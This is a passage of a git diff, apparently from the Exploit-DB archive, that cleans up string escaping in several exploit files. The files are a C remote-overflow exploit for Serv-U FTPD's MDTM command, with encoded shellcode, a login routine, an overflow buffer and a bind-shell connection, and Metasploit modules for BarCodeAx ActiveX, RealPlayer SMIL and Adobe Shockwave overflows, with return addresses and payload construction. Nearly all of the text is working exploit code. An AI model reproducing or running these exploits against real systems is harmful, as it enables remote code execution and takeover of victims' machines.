-\"\\x99\\xCE\\xC9\\xC8\\xC8\\xC8\\xD8\\xC8\\xD0\\xC8\\xC8\\x66\\x2F\\xA9\\x98\\x99\"
-\"\\x99\\xC8\\x66\\xCF\\x91\\xAA\\x59\\xD1\\xC9\\x66\\xCF\\x95\\xCA\\xCC\\xCF\\xCE\"
-\"\\x12\\xF5\\xBD\\x81\\x12\\xDC\\xA5\\x12\\xCD\\x9C\\xE1\\x9A\\x4C\\x12\\xD3\\x81\"
-\"\\x12\\xC3\\xB9\\x9A\\x44\\x7A\\xA9\\xD0\\x12\\xAD\\x12\\x9A\\x6C\\xAA\\x66\\x65\"
-\"\\xAA\\x59\\x35\\xA3\\x79\\xED\\x9E\\x58\\x56\\x9E\\x9A\\x61\\x72\\x6B\\xA2\\xE5\"
-\"\\xBD\\x8D\\xEC\\x78\\x12\\xC3\\xBD\\x9A\\x44\\xFF\\x12\\x95\\xD2\\x12\\xC3\\x85\"
-\"\\x9A\\x44\\x12\\x9D\\x12\\x9A\\x5C\\xC6\\xC7\\xC4\\xC2\\x5B\\x9D\\x99\\xC8\\x66\"
-\"\\xED\\xBD\\x91\\x34\\xC9\\x71\\x3B\\x66\\x66\\x66\\x1A\\x5D\\x9D\\xC0\\x32\\x7B\"
-\"\\x74\\x5A\\xF1\\xFC\\xE1\\xFC\\x99\\xF1\\xFA\\xF4\\xFD\\xB7\\x10\\x3F\\xA9\\x98\"
-\"\\x99\\x99\\x1A\\x75\\xCD\\x14\\xA5\\xBD\\xAA\\x59\\xAA\\x50\\x1A\\x58\\x8C\\x32\"
-\"\\x7B\\x64\\x5F\\xDD\\xBD\\x89\\xDD\\x67\\xDD\\xBD\\xA5\\x67\\xDD\\xBD\\xA4\\x10\"
-\"\\xDD\\xBD\\xD1\\x10\\xDD\\xBD\\xD5\\x10\\xDD\\xBD\\xC9\\x14\\xDD\\xBD\\x89\\x14\"
-\"\\x27\\xDD\\x98\\x99\\x99\\xCE\\xC9\\xC8\\xC8\\xF3\\x9D\\xC8\\xC8\\xC8\\x66\\x2F\"
-\"\\xA9\\x98\\x99\\x99\\xC8\\x66\\xCF\\x91\\x18\\x75\\x99\\x9D\\x99\\x99\\xF1\\x9E\"
-\"\\x99\\x98\\x99\\xCD\\x66\\x2F\\xD1\\x98\\x99\\x99\\x66\\xCF\\x89\\xF3\\xD9\\xF1\"
-\"\\x99\\x89\\x99\\x99\\xF1\\x99\\xC9\\x99\\x99\\xF3\\x99\\x66\\x2F\\xDD\\x98\\x99\"
-\"\\x99\\x66\\xCF\\x8D\\x10\\x1D\\xBD\\x21\\x99\\x99\\x99\\x10\\x1D\\xBD\\x2D\\x99\"
-\"\\x99\\x99\\x12\\x15\\xBD\\xF9\\x9D\\x99\\x99\\x5E\\xD8\\x62\\x09\\x09\\x09\\x09\"
-\"\\x5F\\xD8\\x66\\x09\\x1A\\x70\\xCC\\xF3\\x99\\xF1\\x99\\x89\\x99\\x99\\xC8\\xC9\"
-\"\\x66\\x2F\\xDD\\x98\\x99\\x99\\x66\\xCF\\x81\\xCD\\x66\\x2F\\xD1\\x98\\x99\\x99\"
-\"\\x66\\xCF\\x85\\x66\\x2F\\xD1\\x98\\x99\\x99\\x66\\xCF\\xB9\\xAA\\x59\\xD1\\xC9\"
-\"\\x66\\xCF\\x95\\x71\\x70\\x64\\x66\\x66\\xAB\\xED\\x08\\x95\\x50\\x25\\x3F\\xF2\"
-\"\\x16\\x6B\\x81\\xF8\\x51\\xCE\\xD6\\x88\\x68\\xE2\\x05\\x76\\xC1\\x96\\xD8\\x0E\"
-\"\\x51\\xCE\\xD6\\x8E\\x4F\\x15\\x07\\x6A\\xFA\\x10\\x48\\xD6\\xA4\\xF3\\x2D\\x19\"
-\"\\xB4\\xAB\\xE1\\x47\\xFD\\x89\\x3E\\x44\\x95\\x06\\x4A\\xD2\\x28\\x87\\x0E\\x98\"
-\"\\x06\\x06\\x06\\x06\"
-\"\\x53\\x52\\x31\\x41\";
+"\xFD\x38\xA9\x99\x99\x99\x12\xD9\x95\x12\xD9\x85\x12\x99\x12\xD9"
+"\x91\x18\x75\x19\x98\x99\x99\x12\x65\x12\x76\x32\x70\x8B\x9B\x99"
+"\x99\xC7\xAA\x50\x28\x90\x66\xEE\x65\x71\xB9\x98\x99\x99\xF1\xF5"
+"\xF5\x99\x99\xF1\xAA\xAB\xB7\xFD\xF1\xEE\xEA\xAB\xC6\xCD\x66\xCC"
+"\x9D\x32\xAA\x50\x28\x9C\x66\xEE\x65\x71\x99\x98\x99\x99\x12\x6C"
+"\x71\x94\x98\x99\x99\xAA\x66\x18\x75\x09\x98\x99\x99\xCD\xF1\x98"
+"\x98\x99\x99\x66\xCF\xB5\xC9\xC9\xC9\xC9\xD9\xC9\xD9\xC9\x66\xCF"
+"\xA9\x12\x41\xCE\xCE\xF1\x9B\x99\x8C\x5B\x12\x55\xCA\xC8\xF3\x8F"
+"\xC8\xCA\x66\xCF\xAD\xC0\xC2\x1C\x59\xEC\x68\xCE\xCA\x66\xCF\xA1"
+"\xCE\xC8\xCA\x66\xCF\xA5\x12\x49\x10\x1F\xD9\x98\x99\x99\xF1\xFC"
+"\xE1\xFC\x99\xF1\xFA\xF4\xFD\xB7\x10\x3F\xA9\x98\x99\x99\x1A\x75"
+"\xCD\x14\xA5\xBD\xAA\x59\xAA\x50\x1A\x58\x8C\x32\x7B\x64\x5F\xDD"
+"\xBD\x89\xDD\x67\xDD\xBD\xA5\x67\xDD\xBD\xA4\x10\xCD\xBD\xD1\x10"
+"\xCD\xBD\xD5\x10\xCD\xBD\xC9\x14\xDD\xBD\x89\x14\x27\xDD\x98\x99"
+"\x99\xCE\xC9\xC8\xC8\xC8\xD8\xC8\xD0\xC8\xC8\x66\x2F\xA9\x98\x99"
+"\x99\xC8\x66\xCF\x91\xAA\x59\xD1\xC9\x66\xCF\x95\xCA\xCC\xCF\xCE"
+"\x12\xF5\xBD\x81\x12\xDC\xA5\x12\xCD\x9C\xE1\x9A\x4C\x12\xD3\x81"
+"\x12\xC3\xB9\x9A\x44\x7A\xA9\xD0\x12\xAD\x12\x9A\x6C\xAA\x66\x65"
+"\xAA\x59\x35\xA3\x79\xED\x9E\x58\x56\x9E\x9A\x61\x72\x6B\xA2\xE5"
+"\xBD\x8D\xEC\x78\x12\xC3\xBD\x9A\x44\xFF\x12\x95\xD2\x12\xC3\x85"
+"\x9A\x44\x12\x9D\x12\x9A\x5C\xC6\xC7\xC4\xC2\x5B\x9D\x99\xC8\x66"
+"\xED\xBD\x91\x34\xC9\x71\x3B\x66\x66\x66\x1A\x5D\x9D\xC0\x32\x7B"
+"\x74\x5A\xF1\xFC\xE1\xFC\x99\xF1\xFA\xF4\xFD\xB7\x10\x3F\xA9\x98"
+"\x99\x99\x1A\x75\xCD\x14\xA5\xBD\xAA\x59\xAA\x50\x1A\x58\x8C\x32"
+"\x7B\x64\x5F\xDD\xBD\x89\xDD\x67\xDD\xBD\xA5\x67\xDD\xBD\xA4\x10"
+"\xDD\xBD\xD1\x10\xDD\xBD\xD5\x10\xDD\xBD\xC9\x14\xDD\xBD\x89\x14"
+"\x27\xDD\x98\x99\x99\xCE\xC9\xC8\xC8\xF3\x9D\xC8\xC8\xC8\x66\x2F"
+"\xA9\x98\x99\x99\xC8\x66\xCF\x91\x18\x75\x99\x9D\x99\x99\xF1\x9E"
+"\x99\x98\x99\xCD\x66\x2F\xD1\x98\x99\x99\x66\xCF\x89\xF3\xD9\xF1"
+"\x99\x89\x99\x99\xF1\x99\xC9\x99\x99\xF3\x99\x66\x2F\xDD\x98\x99"
+"\x99\x66\xCF\x8D\x10\x1D\xBD\x21\x99\x99\x99\x10\x1D\xBD\x2D\x99"
+"\x99\x99\x12\x15\xBD\xF9\x9D\x99\x99\x5E\xD8\x62\x09\x09\x09\x09"
+"\x5F\xD8\x66\x09\x1A\x70\xCC\xF3\x99\xF1\x99\x89\x99\x99\xC8\xC9"
+"\x66\x2F\xDD\x98\x99\x99\x66\xCF\x81\xCD\x66\x2F\xD1\x98\x99\x99"
+"\x66\xCF\x85\x66\x2F\xD1\x98\x99\x99\x66\xCF\xB9\xAA\x59\xD1\xC9"
+"\x66\xCF\x95\x71\x70\x64\x66\x66\xAB\xED\x08\x95\x50\x25\x3F\xF2"
+"\x16\x6B\x81\xF8\x51\xCE\xD6\x88\x68\xE2\x05\x76\xC1\x96\xD8\x0E"
+"\x51\xCE\xD6\x8E\x4F\x15\x07\x6A\xFA\x10\x48\xD6\xA4\xF3\x2D\x19"
+"\xB4\xAB\xE1\x47\xFD\x89\x3E\x44\x95\x06\x4A\xD2\x28\x87\x0E\x98"
+"\x06\x06\x06\x06"
+"\x53\x52\x31\x41";
 
 
 /* new:
 * tcp connect with no block socket, host to ip.
-* millisecond timeout, it\'s will be fast.
+* millisecond timeout, it's will be fast.
 *;D
 * 2003/06/23 add by Sam
 */
@@ -190,13 +190,13 @@ int new_tcpConnect (char *host, unsigned int port, unsigned int timeout)
        // reslov hosts
        hp = gethostbyname (host);
        if (NULL == hp) {
-               perror (\"tcpConnect:gethostbyname\\n\");
+               perror ("tcpConnect:gethostbyname\n");
                return -1;
        }
 
        sock = socket (AF_INET, SOCK_STREAM, 0);
        if (-1 == sock) {
-               perror (\"tcpConnect:socket\\n\");
+               perror ("tcpConnect:socket\n");
                return -1;
        }
 
@@ -208,14 +208,14 @@ int new_tcpConnect (char *host, unsigned int port, unsigned int timeout)
         */
        flag = fcntl (sock, F_GETFL);
        if (-1 == flag) {
-               perror (\"tcpConnect:fcntl\\n\");
+               perror ("tcpConnect:fcntl\n");
                close (sock);
                return -1;
        }
 
        flag |= O_NONBLOCK;
        if (fcntl (sock, F_SETFL, flag) < 0) {
-               perror (\"tcpConnect:fcntl\\n\");
+               perror ("tcpConnect:fcntl\n");
                close (sock);
                return -1;
        }
@@ -223,7 +223,7 @@ int new_tcpConnect (char *host, unsigned int port, unsigned int timeout)
        if (connect (sock, (const struct sockaddr *) &addr,
                            sizeof(addr)) < 0 &&
            errno != EINPROGRESS) {
-               perror (\"tcpConnect:connect\\n\");
+               perror ("tcpConnect:connect\n");
                close (sock);
                return -1;
        }
@@ -238,7 +238,7 @@ int new_tcpConnect (char *host, unsigned int port, unsigned int timeout)
        FD_SET (sock, &rset);
 
        if (select (sock+1, &rset, &rset, NULL, &tv) <= 0) {
-//                perror (\"tcpConnect:select\");
+//                perror ("tcpConnect:select");
                close (sock);
                return -1;
        }
@@ -246,7 +246,7 @@ int new_tcpConnect (char *host, unsigned int port, unsigned int timeout)
        pe_len = sizeof (pe);
 
        if (getsockopt (sock, SOL_SOCKET, SO_ERROR, &pe, &pe_len) < 0) {
-               perror (\"tcpConnect:getsockopt\\n\");
+               perror ("tcpConnect:getsockopt\n");
                close (sock);
                return -1;
        }
@@ -258,7 +258,7 @@ int new_tcpConnect (char *host, unsigned int port, unsigned int timeout)
        }
 
        if (fcntl(sock, F_SETFL, flag&~O_NONBLOCK) < 0) {
-               perror (\"tcpConnect:fcntl\\n\");
+               perror ("tcpConnect:fcntl\n");
                close (sock);
                return -1;
        }
@@ -267,7 +267,7 @@ int new_tcpConnect (char *host, unsigned int port, unsigned int timeout)
        pe_len = sizeof (pe);
 
        if (setsockopt (sock, IPPROTO_TCP, TCP_NODELAY, &pe, pe_len) < 0){
-               perror (\"tcpConnect:setsockopt\\n\");
+               perror ("tcpConnect:setsockopt\n");
                close (sock);
                return -1;
        }
@@ -357,7 +357,7 @@ int new_send (int fd, char *buff, size_t len)
        int     ret;
 
        if ((ret = send (fd, buff, len, 0)) <= 0) {
-               perror (\"new_write\");
+               perror ("new_write");
                return -1;
        }
 
@@ -370,7 +370,7 @@ int new_recv (int fd, char *buff, size_t len)
        int     ret;
 
        if ((ret = recv (fd, buff, len, 0)) <= 0) {
-               perror (\"new_recv\");
+               perror ("new_recv");
                return -1;
        }
 
@@ -382,53 +382,53 @@ int ftp_login (char *hostName, short port, char *user, char *pass)
        int     ret, sock;
        char    buff[MAX_LEN];
 
-       fprintf (stderr, \"# Connecting...... \\n\");
+       fprintf (stderr, "# Connecting...... \n");
        if ((sock = new_tcpConnect (hostName, port, 4000)) <= 0) {
-               fprintf (stderr, \"[-] failed. \\n\");
+               fprintf (stderr, "[-] failed. \n");
                return -1;
        }
 
        clearbit (buff);
 
        new_recv (sock, buff, sizeof (buff) - 1);
-       if (!strstr (buff, \"220\")) {
-               fprintf (stderr, \"[-] failed. \\n\");
+       if (!strstr (buff, "220")) {
+               fprintf (stderr, "[-] failed. \n");
                return -1;
        }
-       fprintf (stderr, \"[+] Connected. \\n\");
+       fprintf (stderr, "[+] Connected. \n");
 
        sleep (1);
-       fprintf (stderr, \"[*] USER %s .\\n\", user);
+       fprintf (stderr, "[*] USER %s .\n", user);
        clearbit (buff);
-       snprintf (buff, sizeof (buff), \"USER %s\\r\\n\",  user);
+       snprintf (buff, sizeof (buff), "USER %s\r\n",  user);
        ret = new_send (sock, buff, strlen (buff));
-       fprintf (stderr, \"[*] %d bytes send. \\n\", ret);
+       fprintf (stderr, "[*] %d bytes send. \n", ret);
 
        sleep (1);
 
        clearbit (buff);
        new_recv (sock, buff, sizeof (buff) - 1);
-       if (!strstr (buff, \"331\")) {
-               fprintf (stderr, \"[-] user failed. \\n%s\\n\", buff);
+       if (!strstr (buff, "331")) {
+               fprintf (stderr, "[-] user failed. \n%s\n", buff);
                return -1;
        }
 
-       fprintf (stderr, \"[*] PASS %s .\\n\", pass);
+       fprintf (stderr, "[*] PASS %s .\n", pass);
        clearbit (buff);
-       snprintf (buff, sizeof (buff), \"PASS %s\\r\\n\", pass);
+       snprintf (buff, sizeof (buff), "PASS %s\r\n", pass);
        ret = new_send (sock, buff, strlen (buff));
-       fprintf (stderr, \"[*] %d bytes send. \\n\", ret);
+       fprintf (stderr, "[*] %d bytes send. \n", ret);
 
        sleep (1);
 
        clearbit (buff);
        new_recv (sock, buff, sizeof (buff) - 1);
-       if (!strstr (buff, \"230\")) {
-               fprintf (stderr, \"[-] pass failed. \\n%s\\n\", buff);
+       if (!strstr (buff, "230")) {
+               fprintf (stderr, "[-] pass failed. \n%s\n", buff);
                return -1;
        }
 
-       fprintf (stderr, \"[+] login success .\\n\");
+       fprintf (stderr, "[+] login success .\n");
 
        return sock;
 
@@ -446,7 +446,7 @@ void do_overflow (int sock)
        clearbit (chmodBuffer);
        
        for(i = 0; i < 47; i++) 
-        strcat(chmodBuffer, \"a\");
+        strcat(chmodBuffer, "a");
 for(i = 0; i < 16; i += 8) {
         *(unsigned int*)&chmodBuffer[47+i] = 0x06eb9090;
         *(unsigned int*)&chmodBuffer[51+i] = architectures[x].magic; //0x1002bd78;  //pop reg pop reg ret
@@ -459,20 +459,20 @@ memcpy (&shellcode[120 + 4], &newport, 2);
  strcat(chmodBuffer, decoder);
  
 
-       fprintf (stderr, \"[+] remote version: %s\\n\", architectures[x].desc);
+       fprintf (stderr, "[+] remote version: %s\n", architectures[x].desc);
 
-       fprintf (stderr, \"[+] trigger vulnerability !\\n \");
-       strcpy (Comand, \"MDTM 20031111111111+\");
+       fprintf (stderr, "[+] trigger vulnerability !\n ");
+       strcpy (Comand, "MDTM 20031111111111+");
        strncat (Comand, chmodBuffer, strlen (chmodBuffer) - 1);
-       strcat (Comand, \" \");
+       strcat (Comand, " ");
 
 
        strcat (Comand, shellcode);
       
-       strcat (Comand, \"hacked_by.sst\\r\\n\");
+       strcat (Comand, "hacked_by.sst\r\n");
 
        ret =  new_send (sock, Comand, strlen (Comand));
-       fprintf (stderr, \"[+] %d bytes overflow strings sent!\\n\", ret);
+       fprintf (stderr, "[+] %d bytes overflow strings sent!\n", ret);
 
 
        return;
@@ -485,63 +485,63 @@ void showHELP (char *p)
 {
        int     i;
 
-       fprintf (stderr, \"Usage: %s [Options] \\n\", p);
-       fprintf (stderr, \"Options:\\n\"
-               \"\\t-h [remote host]\\tremote host\\n\"
-               \"\\t-P [server port]\\tserver port\\n\"
-               \"\\t-t [system type]\\tchoice the system type\\n\"
-               \"\\t-u [user   name]\\tlogin with this username\\n\"
-               \"\\t-p [pass   word]\\tlogin with this passwd\\n\"
-               \"\\t-d [shell  port]\\trebind using this port (default: ftpd port)\\n\\n\");
+       fprintf (stderr, "Usage: %s [Options] \n", p);
+       fprintf (stderr, "Options:\n"
+               "\t-h [remote host]\tremote host\n"
+               "\t-P [server port]\tserver port\n"
+               "\t-t [system type]\tchoice the system type\n"
+               "\t-u [user   name]\tlogin with this username\n"
+               "\t-p [pass   word]\tlogin with this passwd\n"
+               "\t-d [shell  port]\trebind using this port (default: ftpd port)\n\n");
 
 
-       printf (\"num . description\\n\");
-       printf (\"----+-----------------------------------------------\"
-               \"--------\\n\");
+       printf ("num . description\n");
+       printf ("----+-----------------------------------------------"
+               "--------\n");
        for (i = 0; i <= MAX_NUM; i ++) {
-               printf (\"%3d | %s\\n\", i, architectures[i].desc);
+               printf ("%3d | %s\n", i, architectures[i].desc);
        }
-       printf (\"    \'\\n\");
+       printf ("    '\n");
        return;
 }
 
 int main (int c, char *v[])
 {
        int             ch, fd, sd;
-       char     *hostName = NULL, *userName = \"ftp\", *passWord = \"sst@SERV-u\";
+       char     *hostName = NULL, *userName = "ftp", *passWord = "sst@SERV-u";
        shellport  = port;
        
 
-       fprintf (stderr, \"Serv-U FTPD 3.x/4.x/5.x MDTM Command remote overflow exploit \"VER\"\\n\"
-               \"bug find by bkbll (bkbll@cnhonker.net) code by Sam (Sam@0x557.org)\\n\\n\");
+       fprintf (stderr, "Serv-U FTPD 3.x/4.x/5.x MDTM Command remote overflow exploit "VER"\n"
+               "bug find by bkbll (bkbll@cnhonker.net) code by Sam (Sam@0x557.org)\n\n");
 
        if (c < 2) {
                showHELP (v[0]);
                exit (1);
        }
 
-       while((ch = getopt(c, v, \"h:t:u:p:P:c:d:\")) != EOF) {
+       while((ch = getopt(c, v, "h:t:u:p:P:c:d:")) != EOF) {
                switch(ch) {
-                       case \'h\':
+                       case 'h':
                                hostName = optarg;
                                break;
-                       case \'t\':
+                       case 't':
                                x = atoi (optarg);
                                if (x > MAX_NUM) {
-                                       printf (\"[-] wtf your input?\\n\");
+                                       printf ("[-] wtf your input?\n");
                                        exit (-1);
                                }
                                break;
-                       case \'u\':
+                       case 'u':
                                userName = optarg;
                                break;
-                       case \'p\':
+                       case 'p':
                                passWord = optarg;
                                break;
-                       case \'P\':
+                       case 'P':
                         port = atoi (optarg);
                         break;
-                       case \'d\':
+                       case 'd':
                         shellport = atoi (optarg);
                         break;
                        default:
@@ -553,7 +553,7 @@ int main (int c, char *v[])
 
        fd = ftp_login (hostName, port, userName, passWord);
        if (fd <= 0) {
-               printf (\"[-] can\'t connnect\\n\");
+               printf ("[-] can't connnect\n");
                exit (-1);
        }
 
@@ -565,11 +565,11 @@ close (fd);
       
        sd = new_tcpConnect (hostName, shellport, 3000);
        if (sd <= 0) {
-               printf (\"[-] failed\\n\");
+               printf ("[-] failed\n");
                return -1;
        }
 
-       fprintf (stderr, \"[+] successed!!\\n\\n\\n\");
+       fprintf (stderr, "[+] successed!!\n\n\n");
        sh (0, 1, sd);
 
        close (sd);
diff --git a/platforms/windows/remote/15809.html b/platforms/windows/remote/15809.html
index 13d0c7955..ed6d325e4 100755
--- a/platforms/windows/remote/15809.html
+++ b/platforms/windows/remote/15809.html
@@ -1,24 +1,24 @@
 Exploit-DB Notes:
-Original credit goes to \"牛奶坦克\" via WooYun:
+Original credit goes to "牛奶坦克" via WooYun:
 http://www.wooyun.org/bugs/wooyun-2010-01006
 
 
 
-
+
 
 
 
-
 		
 				|
 
-		print_status(\"Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...\")
+		print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")
 
 		send_response_html(cli, content)
 
diff --git a/platforms/windows/remote/16565.rb b/platforms/windows/remote/16565.rb
index ce43e61a7..9cbf97f8c 100755
--- a/platforms/windows/remote/16565.rb
+++ b/platforms/windows/remote/16565.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
@@ -18,39 +18,39 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'           => \'RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow\',
-			\'Description\'    => %q{
+			'Name'           => 'RKD Software BarCodeAx.dll v4.9 ActiveX Remote Stack Buffer Overflow',
+			'Description'    => %q{
 				This module exploits a stack buffer overflow in RKD Software Barcode Application
-				ActiveX Control \'BarCodeAx.dll\'. By sending an overly long string to the BeginPrint
+				ActiveX Control 'BarCodeAx.dll'. By sending an overly long string to the BeginPrint
 				method of BarCodeAx.dll v4.9, an attacker may be able to execute arbitrary code.
 			},
-			\'License\'        => MSF_LICENSE,
-			\'Author\'         => [ \'Trancek \', \'patrick\' ],
-			\'Version\'        => \'$Revision: 9262 $\',
-			\'References\'     =>
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 'Trancek ', 'patrick' ],
+			'Version'        => '$Revision: 9262 $',
+			'References'     =>
 				[
-					[ \'URL\', \'http://www.milw0rm.com/exploits/4094\' ],
-					[ \'OSVDB\', \'37482\' ],
-					[ \'BID\', \'24596\' ],
-					[ \'CVE\', \'2007-3435\' ],
+					[ 'URL', 'http://www.milw0rm.com/exploits/4094' ],
+					[ 'OSVDB', '37482' ],
+					[ 'BID', '24596' ],
+					[ 'CVE', '2007-3435' ],
 				],
-			\'DefaultOptions\' =>
+			'DefaultOptions' =>
 				{
-					\'EXITFUNC\' => \'process\',
+					'EXITFUNC' => 'process',
 				},
-			\'Payload\'        =>
+			'Payload'        =>
 				{
-					\'Space\'         => 1024,
-					\'BadChars\' => \"\\x00\\x0a\\x0d\\x20\\\'\\\"%<>@=,.\\#$&()\\\\/\",
-					\'StackAdjustment\' => -3500,
+					'Space'         => 1024,
+					'BadChars' => "\x00\x0a\x0d\x20\'\"%<>@=,.\#$&()\\/",
+					'StackAdjustment' => -3500,
 				},
-			\'Platform\'       => \'win\',
-			\'Targets\'        =>
+			'Platform'       => 'win',
+			'Targets'        =>
 				[
-					[ \'Windows XP SP0 English\', { \'Ret\' => 0x71ab7bfb } ] # jmp esp ws2_32.dll patrickw xpsp0
+					[ 'Windows XP SP0 English', { 'Ret' => 0x71ab7bfb } ] # jmp esp ws2_32.dll patrickw xpsp0
 				],
-			\'DisclosureDate\' => \'Jun 22 2007\',
-			\'DefaultTarget\'  => 0))
+			'DisclosureDate' => 'Jun 22 2007',
+			'DefaultTarget'  => 0))
 	end
 
 	def autofilter
@@ -68,18 +68,18 @@ class Metasploit3 < Msf::Exploit::Remote
 		# Randomize some things
 		vname = rand_text_alpha(rand(100) + 1)
 
-		buff = Rex::Text.rand_text_alphanumeric(656) + [target[\'Ret\']].pack(\'V\') + make_nops(20) + payload.encoded
+		buff = Rex::Text.rand_text_alphanumeric(656) + [target['Ret']].pack('V') + make_nops(20) + payload.encoded
 
 		# Build out the message
 		content = %Q|
-
-
 
 |
 
-		print_status(\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\")
+		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
 
 		# Transmit the response to the client
 		send_response_html(cli, content)
diff --git a/platforms/windows/remote/16586.rb b/platforms/windows/remote/16586.rb
index 08389ade5..931bc231c 100755
--- a/platforms/windows/remote/16586.rb
+++ b/platforms/windows/remote/16586.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require \\\'msf/core\\\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
@@ -18,45 +18,45 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			\\\'Name\\\'           => \\\'RealNetworks RealPlayer SMIL Buffer Overflow\\\',
-			\\\'Description\\\'    => %q{
+			'Name'           => 'RealNetworks RealPlayer SMIL Buffer Overflow',
+			'Description'    => %q{
 					This module exploits a stack buffer overflow in RealNetworks RealPlayer 10 and 8.
 				By creating a URL link to a malicious SMIL file, a remote attacker could
 				overflow a buffer and execute arbitrary code.
-				When using this module, be sure to set the URIPATH with an extension of \\\'.smil\\\'.
+				When using this module, be sure to set the URIPATH with an extension of '.smil'.
 				This module has been tested with RealPlayer 10 build 6.0.12.883 and RealPlayer 8
 				build 6.0.9.584.
 			},
-			\\\'License\\\'        => MSF_LICENSE,
-			\\\'Author\\\'         => \\\'MC\\\',
-			\\\'Version\\\'        => \\\'$Revision: 9262 $\\\',
-			\\\'References\\\'     =>
+			'License'        => MSF_LICENSE,
+			'Author'         => 'MC',
+			'Version'        => '$Revision: 9262 $',
+			'References'     =>
 				[
-					[ \\\'CVE\\\', \\\'2005-0455\\\' ],
-					[ \\\'OSVDB\\\', \\\'14305\\\'],
-					[ \\\'BID\\\', \\\'12698\\\' ],
+					[ 'CVE', '2005-0455' ],
+					[ 'OSVDB', '14305'],
+					[ 'BID', '12698' ],
 				],
 
-			\\\'DefaultOptions\\\' =>
+			'DefaultOptions' =>
 				{
-					\\\'EXITFUNC\\\' => \\\'process\\\',
+					'EXITFUNC' => 'process',
 				},
 
-			\\\'Payload\\\'        =>
+			'Payload'        =>
 				{
-					\\\'Space\\\'    => 500,
-					\\\'BadChars\\\' => \\\"\\\\x00\\\\x90\\\\x0a\\\\x0d\\\\x20\\\\x3c\\\\x3e\\\\x2f\\\\x5c\\\\x22\\\\x58\\\\x3d\\\\x3b\\\\x40\\\\x3f\\\\x27\\\\x26\\\\x25\\\",
-					\\\'StackAdjustment\\\' => -3500,
+					'Space'    => 500,
+					'BadChars' => "\x00\x90\x0a\x0d\x20\x3c\x3e\x2f\x5c\x22\x58\x3d\x3b\x40\x3f\x27\x26\x25",
+					'StackAdjustment' => -3500,
 				},
-			\\\'Platform\\\' => \\\'win\\\',
-			\\\'Targets\\\'        =>
+			'Platform' => 'win',
+			'Targets'        =>
 				[
-					[ \\\'RealPlayer 10/8 on Windows 2000 SP0-SP4 English\\\',     { \\\'Offset\\\' => 608, \\\'Ret\\\' => 0x75022ac4 } ],
-					[ \\\'RealPlayer 10/8 on Windows XP PRO SP0-SP1 English\\\',   { \\\'Offset\\\' => 584, \\\'Ret\\\' => 0x71aa2461 } ],
+					[ 'RealPlayer 10/8 on Windows 2000 SP0-SP4 English',     { 'Offset' => 608, 'Ret' => 0x75022ac4 } ],
+					[ 'RealPlayer 10/8 on Windows XP PRO SP0-SP1 English',   { 'Offset' => 584, 'Ret' => 0x71aa2461 } ],
 				],
-			\\\'Privileged\\\'     => false,
-			\\\'DisclosureDate\\\' => \\\'Mar 1 2005\\\',
-			\\\'DefaultTarget\\\'  => 0))
+			'Privileged'     => false,
+			'DisclosureDate' => 'Mar 1 2005',
+			'DefaultTarget'  => 0))
 	end
 
 	def on_request_uri(cli, request)
@@ -66,18 +66,18 @@ class Metasploit3 < Msf::Exploit::Remote
 		cruft  =  rand_text_alpha_upper(1)
 		bleh   =  rand_text_alpha_upper(11)
 
-		sploit =  rand_text_alpha_upper(target[\\\'Offset\\\']) + payload.encoded
-		sploit << \\\"\\\\xeb\\\\x06\\\" + rand_text_alpha_upper(2) + [target.ret].pack(\\\'V\\\')
-		sploit << [0xe8, -485].pack(\\\'CV\\\')
+		sploit =  rand_text_alpha_upper(target['Offset']) + payload.encoded
+		sploit << "\xeb\x06" + rand_text_alpha_upper(2) + [target.ret].pack('V')
+		sploit << [0xe8, -485].pack('CV')
 
 		# Build the HTML content
-		content =  \\\"\\\"
-		content << \\\"\\\"
+		content =  ""
+		content << ""
 
-		print_status(\\\"Sending exploit to #{cli.peerhost}:#{cli.peerport}...\\\")
+		print_status("Sending exploit to #{cli.peerhost}:#{cli.peerport}...")
 
 		# Transmit the response to the client
-		send_response_html(cli, content, { \\\'Content-Type\\\' => \\\'text/html\\\' })
+		send_response_html(cli, content, { 'Content-Type' => 'text/html' })
 
 		# Handle the payload
 		handler(cli)
diff --git a/platforms/windows/remote/16594.rb b/platforms/windows/remote/16594.rb
index 128d4e7a2..dd383a7ec 100755
--- a/platforms/windows/remote/16594.rb
+++ b/platforms/windows/remote/16594.rb
@@ -9,7 +9,7 @@
 # http://metasploit.com/framework/
 ##
 
-require \'msf/core\'
+require 'msf/core'
 
 class Metasploit3 < Msf::Exploit::Remote
 	Rank = NormalRanking
@@ -18,37 +18,37 @@ class Metasploit3 < Msf::Exploit::Remote
 
 	def initialize(info = {})
 		super(update_info(info,
-			\'Name\'           => \'Adobe Shockwave rcsL Memory Corruption\',
-			\'Description\'    => %q{
-					This module exploits a weakness in the Adobe Shockwave player\'s handling of
+			'Name'           => 'Adobe Shockwave rcsL Memory Corruption',
+			'Description'    => %q{
+					This module exploits a weakness in the Adobe Shockwave player's handling of
 				Director movies (.DIR). A memory corruption vulnerability occurs through an undocumented
 				rcsL chunk. This vulnerability was discovered by http://www.abysssec.com.
 			},
-			\'License\'        => MSF_LICENSE,
-			\'Author\'         => [ \'David Kennedy \"ReL1K\" \'],
-			\'Version\'        => \'$Revision: 10784 $\',
-			\'References\'     =>
+			'License'        => MSF_LICENSE,
+			'Author'         => [ 'David Kennedy "ReL1K" '],
+			'Version'        => '$Revision: 10784 $',
+			'References'     =>
 				[
-					[ \'CVE\', \'2010-3653\'],
-					[ \'OSVDB\', \'68803\'],
-					[ \'URL\', \'https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15296.zip\' ],
+					[ 'CVE', '2010-3653'],
+					[ 'OSVDB', '68803'],
